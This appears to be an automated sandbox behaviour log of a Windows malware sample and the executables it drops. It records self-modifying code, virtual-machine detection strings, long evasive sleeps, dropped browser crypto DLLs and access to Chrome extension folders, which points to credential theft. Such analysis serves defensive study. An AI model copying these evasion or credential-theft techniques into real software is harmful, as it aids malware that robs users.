Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Special instruction interceptor: First address: 495BDC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Special instruction interceptor: First address: 475FCC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Special instruction interceptor: First address: 4FBE20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 52DE32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 555BDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 535FCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 5BBE20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Special instruction interceptor: First address: E4DE32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Special instruction interceptor: First address: E75BDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Special instruction interceptor: First address: E55FCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Special instruction interceptor: First address: EDBE20 instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe Special instruction interceptor: First address: C7EA4F instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe Special instruction interceptor: First address: C7C64E instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe Special instruction interceptor: First address: C7E993 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 1CEA4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 1CC64E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 1CE993 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Code function: 0_2_04C80CC5 rdtsc 0_2_04C80CC5
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1719
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1512
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1563
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1466
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Window / User API: threadDelayed 1642
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Window / User API: threadDelayed 943
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Window / User API: threadDelayed 812
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Window / User API: threadDelayed 499
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Window / User API: threadDelayed 1077
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Window / User API: threadDelayed 506
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Window / User API: threadDelayed 627
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe API coverage: 2.5 %
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7908 Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7908 Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916 Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916 Thread sleep time: -100050s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7876 Thread sleep count: 337 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7876 Thread sleep time: -10110000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7912 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7912 Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7896 Thread sleep count: 1719 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7896 Thread sleep time: -3439719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7904 Thread sleep count: 1512 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7904 Thread sleep time: -3025512s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7900 Thread sleep count: 1563 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7900 Thread sleep time: -3127563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7892 Thread sleep count: 1466 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7892 Thread sleep time: -2933466s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7996 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 6688 Thread sleep count: 103 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 6688 Thread sleep time: -618000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460 Thread sleep count: 499 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460 Thread sleep count: 1077 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460 Thread sleep count: 506 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 3352 Thread sleep count: 97 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 3352 Thread sleep time: -582000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164 Thread sleep count: 270 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164 Thread sleep count: 167 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164 Thread sleep count: 627 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4456 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4456 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Thread sleep count: Count: 1642 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Thread sleep count: Count: 1077 delay: -10
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\userKFHCAEGCBF.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 8_2_6C1DC930
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 0000001F.00000002.2936767105.00000000020D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWi
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware=z
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: vmware
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, RoamingHJDBKJKFIE.exe, 0000000F.00000002.2581280707.0000000000E2B000.00000040.00000001.01000000.0000000D.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp, axplong.exe, 00000013.00000002.2624518320.0000000000349000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk+IB
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Hyper-V (guest)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
